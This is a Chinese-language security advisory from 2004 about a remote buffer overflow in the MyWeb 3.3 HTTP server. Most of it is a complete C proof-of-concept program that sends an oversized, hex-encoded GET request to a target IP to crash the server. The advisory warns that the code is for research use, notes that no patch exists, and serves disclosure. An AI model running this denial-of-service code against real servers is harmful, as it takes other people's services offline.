安全研究

安全漏洞
MyWeb HTTP Server GET请求远程缓冲区溢出漏洞

发布日期:2004-05-07
更新日期:2004-05-13

受影响系统:
xuebrothers MyWeb 3.3
描述:
BUGTRAQ  ID: 10303

MyWeb是一款小型的WEB服务程序,可用于图片、MP3、文件等共享。

MyWeb在特殊构建的HTTP GET请求缺少充分边界检查,远程攻击者可以利用这个漏洞对WEB服务程序进行缓冲区溢出攻击,可能以进程权限在系统上执行任意指令。

提交包含4096字节数据的HTTP GET请求,可导致MyWeb崩溃,精心构建提交数据,可能以进程权限在系统上执行任意指令。

<*来源:badpack3t (badpack3t@security-protocols.com
  
  链接:http://fux0r.phathookups.com/advisory/sp-x11-advisory.txt
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

badpack3t (badpack3t@security-protocols.com)提供了如下测试方法:

/****************************/
   PoC to crash the server
/****************************/

/* MyWeb 3.3 Buffer Overflow
   vendor:
   http://www.xuebrothers.net/myweb/myweb.htm

   coded and discovered by:
   badpack3t <badpack3t@security-protocols.com>
   for .:sp research labs:.
   www.security-protocols.com
   5.6.2004
  
   usage:
   sp-myweb3.3 <targetip> [targetport] (default is 80)

   This PoC will only DoS the server to verify if it is vulnerable.
*/

#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")

char exploit[] =

"\x47\x45\x54\x20\x2f\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x01\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x2e"
"\x68\x74\x6d\x6c\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\x0d\x0a\x52"
"\x65\x66\x65\x72\x65\x72\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x6c"
"\x6f\x63\x61\x6c\x68\x6f\x73\x74\x2f\x66\x75\x78\x30\x72\x0d\x0a"
"\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70"
"\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d"
"\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x0d"
"\x0a\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x4b\x65\x65"
"\x70\x2d\x41\x6c\x69\x76\x65\x0d\x0a\x55\x73\x65\x72\x2d\x41\x67"
"\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x37"
"\x36\x20\x5b\x65\x6e\x5d\x20\x28\x58\x31\x31\x3b\x20\x55\x3b\x20"
"\x4c\x69\x6e\x75\x78\x20\x32\x2e\x34\x2e\x32\x2d\x32\x20\x69\x36"
"\x38\x36\x29\x0d\x0a\x56\x61\x72\x69\x61\x62\x6c\x65\x3a\x20\x72"
"\x65\x73\x75\x6c\x74\x0d\x0a\x48\x6f\x73\x74\x3a\x20\x6c\x6f\x63"
"\x61\x6c\x68\x6f\x73\x74\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d"
"\x6c\x65\x6e\x67\x74\x68\x3a\x20\x35\x31\x33\x0d\x0a\x41\x63\x63"
"\x65\x70\x74\x3a\x20\x69\x6d\x61\x67\x65\x2f\x67\x69\x66\x2c\x20"
"\x69\x6d\x61\x67\x65\x2f\x78\x2d\x78\x62\x69\x74\x6d\x61\x70\x2c"
"\x20\x69\x6d\x61\x67\x65\x2f\x6a\x70\x65\x67\x2c\x20\x69\x6d\x61"
"\x67\x65\x2f\x70\x6a\x70\x65\x67\x2c\x20\x69\x6d\x61\x67\x65\x2f"
"\x70\x6e\x67\x0d\x0a\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f"
"\x64\x69\x6e\x67\x3a\x20\x67\x7a\x69\x70\x0d\x0a\x41\x63\x63\x65"
"\x70\x74\x2d\x43\x68\x61\x72\x73\x65\x74\x3a\x20\x69\x73\x6f\x2d"
"\x38\x38\x35\x39\x2d\x31\x2c\x2a\x2c\x75\x74\x66\x2d\x38\x0d\x0a"
"\x0d\x0a\x77\x68\x61\x74\x79\x6f\x75\x74\x79\x70\x65\x64\x3d\x3f"
"\x0d\x0a";

int main(int argc, char *argv[])
{
    WSADATA wsaData;
    WORD wVersionRequested;
    struct hostent  *pTarget;
    struct sockaddr_in     sock;
    char *target;
    int port,bufsize;
    SOCKET mysocket;
    
    if (argc < 2)
    {
        printf("MyWeb 3.3 Buffer Overflow by badpack3t\r\n
<badpack3t@security-protocols.com>\r\n\r\n", argv[0]);
        printf("Usage:\r\n %s <targetip> [targetport] (default is 80)\r\n\r\n",
argv[0]);
        printf("www.security-protocols.com\r\n\r\n", argv[0]);
        exit(1);
    }

    wVersionRequested = MAKEWORD(1, 1);
    if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;

    target = argv[1];
    port = 80;

    if (argc >= 3) port = atoi(argv[2]);
    bufsize = 1024;
    if (argc >= 4) bufsize = atoi(argv[3]);

    mysocket = socket(AF_INET, SOCK_STREAM, 0);
    if(mysocket==INVALID_SOCKET)
    {    
        printf("Socket error!\r\n");
        exit(1);
    }

    printf("Resolving Hostnames...\n");
    if ((pTarget = gethostbyname(target)) == NULL)
    {
        printf("Resolve of %s failed\n", argv[1]);
        exit(1);
    }

    memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
    sock.sin_family = AF_INET;
    sock.sin_port = htons((USHORT)port);

    printf("Connecting...\n");
    if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
    {
        printf("Couldn't connect to host.\n");
        exit(1);
    }

    printf("Connected!...\n");
    printf("Sending Payload...\n");
    if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)
    {
        printf("Error Sending the Exploit Payload\r\n");
        closesocket(mysocket);
        exit(1);
    }

    printf("Payload has been sent! Check if the webserver is dead y0!\r\n");
    closesocket(mysocket);
    WSACleanup();
    return 0;
}

建议:
厂商补丁:

xuebrothers
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.xuebrothers.net/myweb/myweb.htm

浏览次数:3258
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障